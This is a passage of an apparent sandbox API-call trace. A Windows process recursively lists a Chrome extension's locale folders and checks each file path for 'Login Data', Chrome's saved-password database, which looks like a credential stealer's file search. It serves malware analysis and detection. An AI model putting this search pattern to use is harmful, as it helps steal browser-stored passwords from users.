lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.539] GetProcessHeap () returned 0x8e0000 [0161.539] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.539] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.539] GetProcessHeap () returned 0x8e0000 [0161.539] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.539] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="en_US", cAlternateFileName="")) returned 1 [0161.539] lstrcmpiW (lpString1="en_US", lpString2=".") returned 1 [0161.539] lstrcmpiW (lpString1="en_US", lpString2="..") returned 1 [0161.539] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.539] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.539] lstrlenW (lpString="\\") returned 1 [0161.539] GetProcessHeap () returned 0x8e0000 [0161.539] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.539] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.539] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.539] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.540] lstrlenW (lpString="en_US") returned 5 [0161.540] GetProcessHeap () returned 0x8e0000 [0161.540] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.540] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" [0161.540] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.540] GetProcessHeap () returned 0x8e0000 [0161.540] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.540] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned 140 [0161.540] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned 140 [0161.540] lstrlenW (lpString="\\*.*") returned 4 [0161.540] GetProcessHeap () returned 0x8e0000 [0161.540] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.540] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" [0161.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*.*" [0161.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.541] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.541] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.541] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.541] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.541] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.541] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned 140 [0161.541] lstrlenW (lpString="\\") returned 1 [0161.541] GetProcessHeap () returned 0x8e0000 [0161.541] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.541] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" [0161.541] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\" [0161.541] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\") returned 141 [0161.541] lstrlenW (lpString="messages.json") returned 13 [0161.541] GetProcessHeap () returned 0x8e0000 [0161.541] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.541] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\" [0161.541] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" [0161.541] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.541] GetProcessHeap () returned 0x8e0000 [0161.541] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.541] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json", lpSrch="Login Data") returned 0x0 [0161.541] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.541] GetProcessHeap () returned 0x8e0000 [0161.541] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.541] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.542] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.542] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.542] GetProcessHeap () returned 0x8e0000 [0161.542] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.542] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.542] GetProcessHeap () returned 0x8e0000 [0161.542] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.542] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="es", cAlternateFileName="")) returned 1 [0161.542] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0161.542] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0161.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.542] lstrlenW (lpString="\\") returned 1 [0161.542] GetProcessHeap () returned 0x8e0000 [0161.542] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.542] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.542] lstrlenW (lpString="es") returned 2 [0161.542] GetProcessHeap () returned 0x8e0000 [0161.542] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.542] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" [0161.542] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.542] GetProcessHeap () returned 0x8e0000 [0161.542] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned 137 [0161.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned 137 [0161.542] lstrlenW (lpString="\\*.*") returned 4 [0161.542] GetProcessHeap () returned 0x8e0000 [0161.542] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" [0161.542] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*.*" [0161.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.543] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.543] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.543] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.543] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.543] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.543] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned 137 [0161.543] lstrlenW (lpString="\\") returned 1 [0161.544] GetProcessHeap () returned 0x8e0000 [0161.544] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.544] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" [0161.544] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\" [0161.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\") returned 138 [0161.544] lstrlenW (lpString="messages.json") returned 13 [0161.544] GetProcessHeap () returned 0x8e0000 [0161.544] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.544] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\" [0161.544] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 